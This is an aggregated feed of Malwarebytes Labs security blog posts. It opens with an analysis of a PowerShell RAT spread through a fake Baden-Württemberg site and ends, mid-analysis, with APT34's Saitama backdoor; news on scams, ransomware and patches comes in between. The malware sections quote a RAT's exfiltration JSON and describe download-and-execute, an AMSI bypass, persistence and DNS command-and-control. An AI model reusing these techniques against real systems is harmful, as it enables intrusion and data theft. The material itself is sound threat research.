This blog post was authored by Hossein Jazi and Jérôme Segura

Populations around the world—and in Europe in particular—are following the crisis in Ukraine very closely, and with events unfolding on a daily basis, people are hungry for information.

Although all countries have reasons to be concerned, the situation is Germany is more complicated than most. It is one of the few European countries to have received criticism for its attitude to the Ukraine-Russia conflict, as it struggles to end its reliance on Russian energy, and Moscow recently imposed sanctions on Gazprom Germania, further increasing economic tensions.

This week our analysts discovered a new campaign that plays on these concerns by trying to lure Germans with a promise of updates on the current threat situation in Ukraine. The downloaded document is in fact decoy for a Remote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s computer.

Decoy site lures victims with Ukraine situation

Threat actors registered an expired German domain name at collaboration-bw[.]de that was formally used as a collaboration platform to develop new ideas for the Baden-Württemberg state.

Threat actors registered an expired domain associated with Baden-Württemberg

The threat actors used the domain to host a website that looked like the official Baden-Württemberg website,

A comparison of the real (top) and the malicious fake (bottom)

With this copycat, the attackers created the perfect placeholder for the lure they wanted their victims to download: A file tantalising called 2022-Q2-Bedrohungslage-Ukraine (threat situation in Ukraine for Q2), offered via a prominent blue download button.

The website promises important information and tips about the Ukraine crisis

An English translation of the page reads:

Important, current threat situation regarding the Ukraine crisis On this website you will always find the most important information and tips for dealing with the current threat posed by the Ukraine crisis. Please download the document now and read through the current information. The document is constantly updated and is up to date. Our suggested tips can be practically implemented in everyday work and you should already implement them today. Thanks for your support. File analysis

The archive file called 2022-Q2-Bedrohungslage-Ukraine contains a file named 2022-Q2-Bedrohungslage-Ukraine.chm. The CHM format is Microsoft’s HTML help file format, which consists of a number of compiled HTML files.

The CHM file displays a fake error message

Victims will get a fake error message when they open up that file, while PowerShell quietly runs a Base64 command.

PowerShell executes a Base64-encoded command

After de-obfuscating the command we can see it is designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).

The PowerShell code fetches and executes a malicious script The malicious script downloaded from the fake Baden-Württemberg website

The downloaded script creates a folder called SecuriyHealthService in the current user directory and drops two files into it: MonitorHealth.cmd and a script called Status.txt. The .cmd file is very simple and just executes Status.txt through PowerShell.

Finally, the downloaded script makes MonitorHealth.cmd persistent by creating a scheduled task that will execute it each day at a specific time.

PowerShell RAT (Status.txt)

Status.txt is a RAT written in PowerShell. It starts its activities by collecting some information about the victim’s computer, such as the current username and working directory, and the computer’s hostname. It also builds a unique id for the victim, the clientid.

This data is exfiltrated as a JSON data structure sent to the server via a POST request:

$json = '{ "type": "newclient", "result": "", "pwd": "' + $pwd_b64 + '", "cuser": "' + $cuser + '", "hostname": "' + $hname + '", "clientid": "' + $clientid + '" }'; $headers = @{'X-Request-ID' = $strhash;}

However, before executing this requests the script will first bypass the Windows Antimalware Scan Interface (AMSI) using an AES-encrypted function called bypass. It is decrypted using a generated key and IV before execution.

The bypass function that contains the encrypted script to bypass AMSI. The content of the AMSI bypass script after decryption

This RAT has the following capabilities:

  • Download (type: D0WNl04D): Download files from server
  • Upload (type: UPL04D): Upload file to the server
  • LoadPS1 (type: L04DPS1): Load and execute a PowerShell script
  • Command (type: C0MM4ND): Execute a specific command
German command and control server

The attack was thoughtfully carried out—even ensuring that the stolen data was sent to a German domain name, kleinm[.]de, to avoid suspicion.

It is not easy to attribute this activity to a specific actor, and there are no solid indicators to support attribution. Based on motivation alone, we hypothesise that a Russian threat actor could be targeting German users, but without clear connections in infrastructure or similarities to known TTPs, such attribution is weak.

The Malwarebytes Threat Intelligence team continues to monitor attacks taking advantage of the war in Ukraine while ensuring our customers are protected.

Indicators of Compromise (IOCs)

Phishing site







MITRE ATT&CK TacticIDNameDescriptionExecutionT1059 Command and Scripting InterpreterStarts cmd.exe to run hh.exeExecutes PowerShell script to download and execute a scriptPersistenceT1053Scheduled Task/JobExecutes task scheduler to add MonitorHealth.cmd as a daily taskDefense evasionT1222File and Directory Permissions ModificationUses attrib.exe to hide SecuriyHealthService folder

The post Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to spot the signs of a virtual kidnap scam

Malwarebytes - Sun, 05/15/2022 - 20:06

Threats and bluster play a key role in most online attacks: Ransomware has its ransom note; trolls threaten to ramp up the pressure; tech support scammers insist your PC needs urgent assistance.

Some take it a step further, leaning in with a more direct approach, ranging from death threats to sextortion, and even kidnap claims. These tactics have been around for a very long time. You can reach back to 2007 and look in amazement at the 419 death threat. In 2013, we had pretend hitmen threatening murder unless victims paid $25,000 to survive their non-existent wrath.

An example of the kidnapping variety is currently in the news, and it’s well worth familiarising yourself with it.

The virtual kidnap: Step by step

Kidnap scams involve making a phone call to a victim and telling them a loved one has been taken. Threats of violence soon follow, unless a ransom—typically in the form of a wire transfer—is paid. The most disturbing aspect of these calls is that scammers play recordings of screams in the background.

One horribly fascinating aspect of this crime is that panic and adrenaline can convince victims that the voice they hear is that of their son, daughter, spouse, and so on. You see this time and time again. In that kind of high-stakes, high-pressure scenario, who can blame them?

Things become even worse when social engineering combines with publicly available data to make it even more convincing.

Profiling the victim

Victims of the most recent virtual kidnap attempt likely had some of their information used against them in the call. Scammers pretended to have someone’s mother held hostage, with the threat of never seeing her again. Sadly, the ruse was made more convincing because the caller ID displayed as the recipient’s mother’s phone number. Somehow, somewhere, they were able to connect the two relatives and their cell numbers.

The already convincing impact of the scream recording would be amplified by the recognisable number. At this point, it’s already game over. The fraudster on this occasion asked for money to be sent through Venmo. We see criminals gravitating to digital payment systems, cryptocurrencies, and even gift cards across most realms of attack. Wire fraud is still big business, but digital transfers are appealing to those wanting to make a quick getaway.

On this occasion, the victim is $900 out of pocket and that’s before we consider the significant psychological impact of a supposed kidnap phone call.

Tips to avoid virtual kidnapping attempts

This is clearly an incredibly disturbing thing to have happen, and plenty of tactics to combat this crime have developed this past decade. FBI Chicago released several good pieces of advice in March, which take into account the social engineering side of things:

  • Never post news of upcoming travel dates and locations online.
  • Discuss virtual kidnapping with family members prior to any travel.
  • Have a “password” that family members can use to confirm a loved one is really in trouble.
  • Be wary of providing financial information to strangers over the phone.

Some of the other tips focus mainly on bogus wire transfers. As we see above, criminals are happy to use other methods to swipe ill-gotten gains. Not being able to describe the victim is another good tip, but how many people would risk asking this in the heat of the moment? Would you really want to upset a kidnapper and have them just hang up because you said the wrong thing?

Keeping cell phone numbers private on any website is a must. Posting photos of your vacation in real-time? Set up a private Instagram and share it with close friends and family only. Don’t leave contact details of family members stored in easily compromised email accounts. Lock them down with whatever additional methods are to hand. 2 factor authentication and password managers are good places to start.

Nobody wants a late night call claiming a loved one is being held hostage. Having said that, if the worst happens? Keep cool, take a deep breath, and work your way though the above suggestions. It’s almost certainly an astonishingly malicious piece of fakery.

The post How to spot the signs of a virtual kidnap scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Virtual credit cards coming to Chrome: What you need to know

Malwarebytes - Thu, 05/12/2022 - 15:38

When you’re buying things online, reducing the exposure of payment details during transactions is one way to help reduce the risk of data theft. If you can hide this payment data and switch it out for something else entirely, even better.

Google is proposing to do just that for customers in the US, with recently announced plans to offer a virtual credit card service for Chrome.

What is a virtual credit card?

The concept of virtual credit cards has been around for some time now. But with Google proposing to start using virtual credit cards, more people are likely to start talking about them.

Have you ever used a disposable email alias, or a VoIP service which displays a number of your choosing? These are ways you can keep your most personal information safe from prying eyes. Going one step further, it can be a valuable tool to pin down who’s had a breach, and who voluntarily leaks your data. If you create an email alias for every service you use, you’ll know the moment something has happened if the alias shows up in a dump or you receive spam on it.

Virtual credit card numbers share a few of these traits. Your actual card number never goes online. In its place is a variety of virtual numbers generated by your card provider connected to your account. These numbers may well expire at a set period in the future like real ones, so you don’t have to worry about an ever-increasing set of virtual details gathering dust in the corner.

Years ago, when I first started going to security conferences overseas, my bank card wasn’t accepted in most of the cities I visited. A stop-gap solution to this was someone buying me a bunch of pre-paid credit cards. This helped keep my real card safe. Virtual cards are like a significantly more advanced version of pre-pay efforts. When I used them, some pre-paid cards had a cap on funds allocated so you had to buy several at a time, and they also expired if you didn’t use the money within a certain time period.

Good news: You don’t have to worry about any of this with a virtual card number.

What is Chrome offering to US based users?

Here’s what Google has to say on the subject:

As people do more shopping online, keeping payment information safe and secure is critically important. We’re launching virtual cards on Chrome and Android. When you use autofill to enter your payment details at checkout, virtual cards will add an additional layer of security by replacing your actual card number with a distinct, virtual number. This eliminates the need to manually enter card details like the CVV at checkout, and they’re easy to manage at — where you can enable the feature for eligible cards, access your virtual card number, and see recent virtual card transactions. Virtual cards will be rolling out in the US for Visa, American Express, Mastercard and all Capital One cards starting this summer.

According to TechCrunch, Google “will not use any of this information for ad targeting purposes”. It remains to be seen if or when this rollout will extend to regions outside of the US.

Keeping you safe, and saving you time

The aim of the game is to make it harder for fraudsters to obtain your genuine details. Losing your card data to a skimming attack on a hijacked site or having it swiped from a database is a huge pain. Phonecalls and cancelled cards await.

I myself have had credit card details compromised. To this day, I have no idea how or where it happened. I only know that it involved a spectacular amount of wine. It happened during a rather complicated long distance house move, and having to sink time into calling fraud teams, cancelling the card I really could have done with for the move, and having a replacement card almost sent to the wrong address by mistake was really not great.

Yet these are the additional complications any sort of compromise routinely throw up. It’s never “just” the card details. If I’d had a virtual card number when the great wine heist of 2016 had taken place, it wouldn’t have mattered at all. I could have just switched to a new virtual number and be done. No card replacement required.

Tightening the grip on bogus transactions

Banks are increasingly ramping up checks made when trying to buy items online. Seeing a Verified by Visa popup, or a request to use an authenticator device, is fairly common. These tactics appear to be working. One bank reported 2,000 fewer cases of card fraud per month after the introduction of new payment checks.

Elsewhere, Apple Pay is serious about enhancing fraud prevention features. Location specific features (should you have them enabled) will help shut down rogue payment attempts.

A recent report claims card fraud losses could hit around $408.50 billion globally over the next decade. These are huge numbers to contend with. We’re going to need every tool available to chip away at that number. Whether you’re using virtual numbers, pre-loaded cards, or another method altogether for real world payments, having so many options available can only be a good thing.

The post Virtual credit cards coming to Chrome: What you need to know appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Clearview AI banned from selling facial recognition data in the US

Malwarebytes - Thu, 05/12/2022 - 15:22

Clearview AI, a facial recognition software and surveillance company, is permanently banned from selling its faceprint database within the United States. The company also cannot sell its database to state and law enforcement entities in Illinois for five years.

This is a historic win for the American Civil Liberties Union (ACLU). This nonprofit organization filed a lawsuit against Clearview in 2020, alleging the company has built its business around secretly taking facial recognition data from people without consent.

“By requiring Clearview to comply with Illinois’ pathbreaking biometric privacy law not just in the state, but across the country, this settlement demonstrates that strong privacy laws can provide real protections against abuse,” said ACLU’s Deputy Director Speech, Privacy, and Technology Project Nathan Freed Wessler (@NateWessler) in a statement.

“Clearview can no longer treat people’s unique biometric identifiers as an unrestricted source of profit. Other companies would be wise to take note, and other states should follow Illinois’ lead in enacting strong biometric privacy laws.”

Clearview AI was known for scraping images of people from social networking sites, particularly Facebook, YouTube, Venmo, and other websites. According to a New York Times expose, Clearview’s app can show you additional photos of a person—after taking a snap of them—along with links to where these appeared.

Knowing this, a San Francisco Bay Area photographer and writer named Thomas Smith requested all his data from Clearview. And what came back, he said, freaked him out.

Under the settlement agreement, Clearview must also have an opt-out feature available on its website for Illinois residents so their faceprints can stop appearing in Clearview search results. They are further barred from offering free access to individual police officers without the approval of their respective departments.

The post Clearview AI banned from selling facial recognition data in the US appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cyberattacks on SATCOM networks attributed to Russian threat actors

Malwarebytes - Thu, 05/12/2022 - 13:22

The Cybersecurity & Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have updated their joint cybersecurity advisory, Strengthening Cybersecurity of SATCOM Network Providers and Customers, originally released March 17, 2022, with US government attribution to Russian state-sponsored malicious cyberactors.

Critical infrastructure

When we touched on the subject a few months ago, we explained why we think satellites are critical infrastructure. Commercial satellites provide us with the ability to establish services like Internet access, television, GPS, and scientific information about the weather and other processes in the atmosphere and on the surface.

On March 17, 2022, the Cybersecurity & Infrastructure Security Agency (CISA) published an alert in conjunction with the Federal Bureau of Investigation (FBI) which warned of possible threats to US and international satellite communication (SATCOM) networks.

Along with that alert came a report that provided mitigation strategies for SATCOM providers and their customers. And, as part of CISA’s Shields Up initiative, all organizations are being asked to significantly lower their threshold for reporting and sharing indications of malicious cyberactivity.

Spill over

The United States believes Russia launched cyberattacks in late February against commercial satellite communications networks to disrupt Ukrainian command and control during the Russia invasion, and those actions had spillover impacts into other European countries.

In the months leading up to and after Russia’s invasion began, Ukraine experienced a series of disruptive cyber operations, including website defacements, distributed denial-of-service (DDoS) attacks, and cyberattacks to delete data from computers belonging to government and private entities.

For example, the United States has assessed that Russian military cyber operators have deployed multiple families of destructive wiper malware, like HermeticWiper, on Ukrainian Government and private sector networks.

Now, the US is sharing publicly its assessment that Russia launched cyberattacks in late February against commercial satellite communications networks to disrupt Ukrainian command and control during the invasion, and those actions had spillover impacts into other European countries.


In order to uphold the rules-based international order in cyberspace, the US and its allies and partners are taking steps to defend against Russia’s actions. The US government has developed new mechanisms to help Ukraine identify cyberthreats and recover from cyberincidents.

CISA has exchanged technical information on cybersecurity threats related to Russia’s further invasion of Ukraine with key partners, including Ukraine.

Mitigation guidance

On March 17, 2022 CISA issued an alert providing technical details and mitigation guidance on possible threats to US and international SATCOM networks. A quick recap:

  • Use secure methods for authentication.
  • Enforce principle of least privilege through authorization policies.
  • Review existing trust relationships with IT service providers.
  • Implement independent encryption across all communications links leased from, or provided by, your SATCOM provider.
  • Strengthen the security of operating systems, software, and firmware, including vulnerability and patch management.
  • Monitor network logs for suspicious activity and unauthorized or unusual login attempts.
  • Create, maintain, and exercise a cyberincident response plan, resilience plan, and continuity of operations plan so that critical functions and operations can be kept running if technology systems—including SATCOM networks—are disrupted or need to be taken offline.

Stay safe, everyone!

The post Cyberattacks on SATCOM networks attributed to Russian threat actors appeared first on Malwarebytes Labs.

Categories: Techie Feeds

F5 BIG-IP vulnerability is now being used to disable servers

Malwarebytes - Thu, 05/12/2022 - 12:51

As we reported a few days ago, a F5 BIG-IP vulnerability listed as CVE-2022-1388 is actively being exploited. But now researchers have noticed that attackers aren’t just taking control of the vulnerable servers but also making them unusable by destroying the device’s file system.


The BIG-IP platform by F5 is a family of products covering software and hardware designed around application availability, access control, and security solutions. It is used for various applications like load balancing and application delivery.

On May 4, 2022 F5 notified users of the existence of a vulnerability in BIG-IP iControl REST where undisclosed requests could bypass iControl REST authentication. F5 said the vulnerability could allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. The attacker, in other words, could gain complete control over the affected device.

Soon after the patch, two separate groups of researchers announced on Twitter that they had developed exploits and would publish them soon. Other researchers noticed online scanning was ongoing for BIG-IP.

Due to the critical nature of the bug, F5 urged admins to apply updates as soon as possible.

New type of attack

While most of the attacks so far were aimed at creating a foothold or gathering information for further attacks, we are now seeing a very different and destructive type of attacks.

At least one group of attackers is sending commands to vulnerable devices that delete the whole F5 file system, which is breaking load balancing and websites.

Attackers are wiping vulnerable devices’ file systems

While destroying the file system of the device may seem worse than data exfiltration or planting a backdoor at first glance, some researchers are saying it may be a blessing in disguise. The group is making the vulnerable devices unavailable for threat actors that are trying to utilize the more monetizable attack vectors. Most of the original attacks were dropping web shells, which are malicious scripts used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

The motives of this threat actor are hard to guess. Maybe it’s simply a case of showing off, or an act out of sheer frustration.

But for those running a vulnerable device this makes the “can’t patch now, for it will make the device unavailable” argument moot. If this attackers gets to you the device will be unavailable for much longer than it takes to patch.

Stay safe, everyone!

The post F5 BIG-IP vulnerability is now being used to disable servers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

College closes down after ransomware attack

Malwarebytes - Thu, 05/12/2022 - 10:21

Lincoln College, one of the few rural schools in Illinois, said that it will permanently close on Friday, May 13, after 157 years, partly due to the impacts of the COVID-19 pandemic and partly due to a long recovery after a ransomware attack in December 2021. The institution notified the Illinois Department of Higher Education and Higher Learning Commission and posted a goodbye note on its website.

“Lincoln College has survived many difficult and challenging times – the economic crisis of 1887, a major campus fire in 1912, the Spanish flu of 1918, the Great Depression, World War II, the 2008 global financial crisis, and more, but this is different. Lincoln College needs help to survive.”

The institution struggled during the ongoing pandemic and a December 2021 ransomware attack only challenged it further. Lincoln said the attack “thwarted admissions activities and hindered access to all institutional data, creating an unclear picture of Fall 2022 enrollment projections”.

” All systems required for recruitment, retention, and fundraising efforts were inoperable. Fortunately, no personal identifying information was exposed. Once fully restored in March 2022, the projections displayed significant enrollment shortfalls, requiring a transformational donation or partnership to sustain Lincoln College beyond the current semester.”

The closing of a US college or university marks another first in ransomware attack history. Director of Research and Education Networks Information Sharing and Analysis Center (ISCA) Kim Milford told NBC News, which first broke the story, that a school closing only underscores the toll a ransomware attack can take on its victim. “I feel really bad for Lincoln College and wish there was some way we could help, but it can be a very expensive proposition when you’re hit by ransomware,” she said.

How to avoid ransomware attacks
  1. Require the use of multi-factor authentication (MFA). It might feel like a bother, but MFA is relatively easy to set up, and it doesn’t disrupt normal day-to-day activities.
  2. Install security software on all systems. Use one that offers multiple layers of protection against online threats, especially ransomware.
  3. Patch as soon as you can. Universities rely on various software for various tasks. Keeping it all up-to-date means cybercriminals can’t exploit existing and known flaws.
  4. Promote awareness for all faculty members and staff. Educating university employees to help them understand their part in protecting the university from cyberattacks is essential. Remember that this is every faculty, school staff, and students’ responsibility, not just the people in IT.
  5. Back up your files. When it comes to ransomware attacks, this is one of the pieces of advice we give out. But as we found out, you have to know how to back things up properly. This episode of our Lock and Code podcast is worth a listen, where Matt Crape, technical account manager of VMWare, to learn more about why backups fail us when we need them the most.
This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

If you want to read more about how to protect yourself from a ransomware attack, or how to recover if you are in the midst of one, download our Ransomware Emergency Kit.

The post College closes down after ransomware attack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Update now! Microsoft releases patches, including one for actively exploited zero-day

Malwarebytes - Wed, 05/11/2022 - 14:36

Microsoft has released patches for 74 security problems, including fixes for seven “critical” vulnerabilities, and an actively exploited zero-day vulnerability that affects all supported versions of Windows.

First, we’ll look at the actively exploited zero-day. Then we’ll discuss two zero-days that are publicly disclosed, but so far no in the wild exploits have been reported. And we’ll finish off with a few others that are worth keeping an eye on.

LSA spoofing zero-day

Microsoft has addressed an actively exploited Windows LSA spoofing zero-day that allows unauthenticated attackers to remotely force domain controllers to authenticate them via the Windows NT LAN Manager (NTLM) security protocol.

CVE-2022-26925: An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM. The security update detects anonymous connection attempts in LSARPC and disallows it.

LSA (short for Local Security Authority) is a protected Windows subsystem that enforces local security policies and validates users for local and remote sign-ins. LSARPC is a protocol that enables a set of remote procedure calls (RPCs) to the LSA. Microsoft warns that the CVSS score would be 9.8 out of 10 when this vulnerability is chained with the noted NTLM Relay Attacks on Active Directory Certificate Services (AD CS).

The attack vector is closely related to the PetitPotam attacks we saw last year. If you are looking which patches to prioritize, this vulnerability affects all servers but domain controllers should be prioritized in terms of applying security updates.

Windows Hyper-V vulnerability

CVE-2022-22713: A denial of service (DoS) vulnerability in Windows Hyper V. Successful exploitation of this vulnerability requires an attacker to win a race condition. A race condition occurs when two or more threads can access shared data and they try to change it at the same time.

Hyper V is a native hypervisor, which means it can create virtual machines on x86-64 systems running Windows. The vulnerability only affects Windows Server (version 20H2) and Windows 10 x-64 based systems (versions 20H2 , 21H1, 21H2).

Redshift driver

CVE-2022-29972: A vulnerability that affects the Amazon Redshift ODBC and JDBC drivers and Amazon Athena ODBC and JDBC drivers due to improper validation of authentication tokens which may allow for unintended program invocation.

Microsoft products Azure Synapse Pipelines and Azure Data Factory are affected by a vulnerability in the Magnitude Simba Amazon Redshift ODBC Driver. An ODBC driver uses the Open Database Connectivity (ODBC) interface by Microsoft that allows applications to access data in database management systems (DBMS) using SQL (Structured Query Language) as a standard for accessing the data.

The vulnerability was dubbed SynLapse by the researchers that discovered it. They believe the tenant separation in the Microsoft Azure Synapse service is insufficiently robust to protect secrets against other tenants.

Windows Network File System

Next is a Remote Code Execution (RCE) vulnerability affecting Windows Network File System (NFS) listed under CVE-2022-26937. This vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). Microsoft considers it likely to be exploited and it is one of the highest-rated vulnerabilities of the month with a CVSS score of 9.8 out of 10.

Point-to-Point Tunneling Protocol

CVE-2022-21972: a Point-to-Point Tunneling Protocol Remote Code Execution vulnerability. An unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine. A remote access server (RAS) is a type of server that provides a suite of services to remotely connected users over a network or the Internet.

CVE-2022-23270: another Point-to-Point Tunneling Protocol Remote Code Execution vulnerability. An unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine.

Successful exploitation of these two vulnerabilities requires an attacker to win a race condition.

Other updates

Microsoft is not the only vendor to issue patches. Here are some other that may deserve your attention.

Stay safe, everyone!

The post Update now! Microsoft releases patches, including one for actively exploited zero-day appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Canon printer owners: Be careful of bogus driver download sites

Malwarebytes - Wed, 05/11/2022 - 08:43

Think of all the really common, very mundane things you search for of a tech nature. Drivers. Scanners. Printers. A broken photocopier. USB sticks not recognised. Activating a streaming service which refuses to play ball.

Some of the above have many issues already with bogus search engine results and tech support scams. Streaming and other internet based viewing options have their own support related perils to contend with.

Have you ever stopped to consider what’s lurking out there in relation to your humble printer?

Bogus Canon sites causing headaches

Gizmodo reports that numerous dodgy sites are riding on the coat-tails of the Canon printer brand, extracting cash however they can. Gizmodo discovered the sites after issuing a Freedom of Infomation request to the Federal Trades Commission (FTC) in relation to Canon-specific complaints.

The sites vary in terms of style or general setup, but all focus on having you download Canon drivers. However, when someone attempts to download the driver, the download fails and the site displays a message with a phone number you can call for assistance. We’re very quickly in the realm of tech support scams. Direct requests for money in exchange for supposed drivers, or remote access requests quickly follow.

According to Gizmodo, there are also “support packages” available to buy over the phone which (of course) fail to materialise. All tried and tested Windows-centric tech support scam tactics.

Site specifics

The sites are referred to as fairly sophisticated. In fairness, a few of those listed are already offline or not responding to requests, so they may have been shut down since the report went live.

What’s left is sites which look a bit like blogs and loop visitors round, with no download in site. Others are a bit more professional looking, and ask you to download a driver first.

Another is very upfront about you phoning the listed number before apparently doing anything else. No matter which site you end up on, they’re all about the drivers.

A very testing download

We decided to check one of the few remaining sites and see how hard it leans into error messages after a driver search. Testing the site in the above screenshot, the download button leads to another website altogether. I decided to look for a Canon PIXMA:

The site looks as though it has my driver. Success! Except not really. I’m not saying the odds are stacked against you when using this site, but look at the destination URL in the bottom left hand corner when hovering over the download driver button:

Yes, that does say /error.html. Yes, we’re about to run into that most common of tech support scam pages:

Printer driver installation has been failed due to fatal error “C0000022” preventing product driver installation. Please contact Canon Customer Support For Assistance! Click on below button to connect live chat experts

Tracing a problem

The Gizmodo article contains numerous examples of this type of scam. I decided to check out the BBB scam tracker and see if I could observe the evolution of the Canon scam. It turns out that you actually can (to a degree).

I turned up 17 reports of Canon themed scams from the beginning of 2021 to the present day across Canada and the US. They’re tagged as a mixture of phishing, tech support, and fake invoices.

What’s interesting is that most of the oldest scams are all about Canon cameras. Some are bogus orders, or missed deliveries. At the start of March, we see our first Canon printer tale of woe and it’s our old friend the customer support conversation slide.

Scammers inserted themselves into a help session for a Canon printer and posed as certified Canon technicians. They took remote control of my computer, got personal information and credit card numbers and charged $199 unsuccessfully.

In September, there’s a blend of printer driver and fake infection tactics:

Global Assistance has a scam that leads you to their fake canon website. They make you believe that you have computer infections that prohibit you from connecting to your printer. You have to pay for their services and then they make you believe that you need protection for all of your devices that can connect to the internet. After I fell for this, I did my research and found out that they are a scam. I called them and they refused to refund my money, $362.16 tonight.

Pretty much everything after September is a Canon printer scam—from bogus tech support and remote mobile/desktop connections to people being signed up to cryptocurrency and references to ransomware.

How to avoid these support sites

Never download a driver from anywhere other than the official Canon site. As long as you’re on, you can feel reassured you are very likely not being scammed.

The moment you’re asked to call somebody, or grant them remote access to your device, close the site you’re on and ensure you’re where you want to be. As we’ve seen, this somewhat unique offshoot of the tech support scam can end up being just as costly.

The post Canon printer owners: Be careful of bogus driver download sites appeared first on Malwarebytes Labs.

Categories: Techie Feeds

APT34 targets Jordan Government using new Saitama backdoor

Malwarebytes - Tue, 05/10/2022 - 20:49

On April 26th, we identified a suspicious email that targeted a government official from Jordan’s foreign ministry. The email contained a malicious Excel document that drops a new backdoor named Saitama. Following our investigation, we were able to attribute this attack to the known Iranian Actor APT34.

Also known as OilRig/COBALT GYPSY/IRN2/HELIX KITTEN, APT34 is an Iranian threat group that has targeted Middle Eastern countries and victims worldwide since at least 2014. The group is known to focus on the financial, governmental, energy, chemical, and telecommunication sectors.

In this blog post, we describe the attack flow and share details about the Saitama backdoor.

Malicious email file

The malicious email was sent to the victim via a Microsoft Outlook account with the subject “Confirmation Receive Document” with an Excel file called “Confirmation Receive Document.xls”. The sender pretends to be a person from the Government of Jordan by using its coat of arms as a signature.

Figure 1: Malicious email Excel document

The Excel attachment contains a macro that performs malicious activities. The document has an image that tries to convince the victim to enable a macro.

Figure 2: Excel doc

After enabling the macro, the image is replaced with the Jordan government’s the coat of the arms:

Figure 3: Excel doc after enabling the macro

The macro has been executed on WorkBook_Open(). Here are the main functionalities of this macro:

Figure 4: Macro
  • Hides the current sheet and shows the new sheet that contains the coat of arms image.
  • Calls the “eNotif’ function which is used to send a notification of each steps of macro execution to its server using the DNS protocol. To send a notification it builds the server domain for that step that contains the following parts: “qw” + identification of the step (in this step “zbabz”) + random number + domain name ( = Then it uses the following WMI query to get the IP address of the request: Select * From Win32_PingStatus Where Address = ‘” & p_sHostName & “‘” which performs the DNS communication the the created subdomain.
  • Creates a TaskService object and Gets the task folder that contains the list of the current tasks
  • Calls ENotif function
  • Checks if there is a mouse connected to PC and if that is the case performs the following steps
    • Creates %APPDATA%/MicrosoftUpdate directory
    • Creates “Update.exe”, “Update.exe.config” and “Microsoft.Exchange.WenServices.dll”
    • Reads the content of the UserForm1.label1, UserForm2.label1 and UserForm3.label1 that are in base64 format, decodes them and finally writes them into the created files in the previous step
    • Calls a ENotif function for each writes function
  • Checks the existence of the Update.exe file and if for some reason it has not been written to disk, it writes it using a technique that loads a DotNet assembly directly using mscorlib and Assembly.Load by manually accessing the VTable of the IUnknown. This technique was taken from Github (link). Even though, this technique was not used in this macro since the file was already written, the function name (“Test”) suggests that the threat actor is trying to implement this technique in future attacks.
  • Finally, it calls the ENotif function.
Figure 5: Load .Net assembly
  • Defines a xml schema for a scheduled task and registers it using the RegisterTask function. The name of the scheduled task is MicrosoftUpdate and is used to make update.exe persistent.
Figure 6: Task Schema Saitama Backdoor – A finite state machine

The dropped payload is a small backdoor that is written in .Net. It has the following interesting pdb path: E:\Saitama\Saitama.Agent\obj\Release\Saitama.Agent.pdb.

Saitama backdoor abuses the DNS protocol for its command and control communications. This is stealthier than other communication methods, such as HTTP. Also, the actor cleverly uses techniques such as compression and long random sleep times. They employed these tricks to disguise malicious traffic in between legitimate traffic.

Figure 7: DNS communications

Another element that we found interesting about this backdoor is the way that it is implemented. The whole flow of the program is defined explicitly as a finite-state machine, as shown in the Figure 7. In short, the machine will change its state depending on the command sent to every state. Graphically, the program flow can be seen as this:

Figure 8: Graphical view of the state machine

The finite-machine state can be:


It is the initial state of the machine. It just accepts the start command that puts the machine into the ALIVE state.


This state fetches the C&C server, expecting to receive a command from the attackers. These servers are generated by using the PRNG algorithm that involves transformations like the Mersenne Twister. These transformations will generate subdomains of the hard coded domains in the Config class (Figure 8).

Figure 9: Main domains are hardcoded

Figure 9 shows an example of the generated subdomain:

Figure 10: Connection attempt to a C&C server

This state has two possible next stages. If the performed DNS request fails, the next stage is SLEEP. Otherwise, the next stage is RECEIVE.


These states put the backdoor in sleep mode. The amount of time that the program will sleep is determined by the previous stage. It is clear that one of the main motivations of the actor is to be as stealthy as possible. For example, unsuccessful DNS requests puts the backdoor in sleep mode for a time between 6 and 8 hours! There are different sleep times depending on the situations (values are expressed in milliseconds):

Figure 11: A different sleep time for every situation

There is also a “Second Sleep” state that puts the program on sleep mode a different amount of time.


This state is used to receiving commands from the C&C servers. Commands are sent using the IP address field that is returned by the DNS requests. Further details about the communication protocol are provided later in this report. In a nutshell, every DNS request is capable of receiving 4 bytes. The backdoor will concatenate responses, building buffers in that way. These buffers will contain the commands that the backdoor will execute.

DO (DoTask)

That state will execute commands received from the server. The backdoor has capabilities like executing remote pre-established commands, custom commands or dropping files. The communication supports compression, also. The following figure shows the list of possible commands that can be executed by the backdoor.

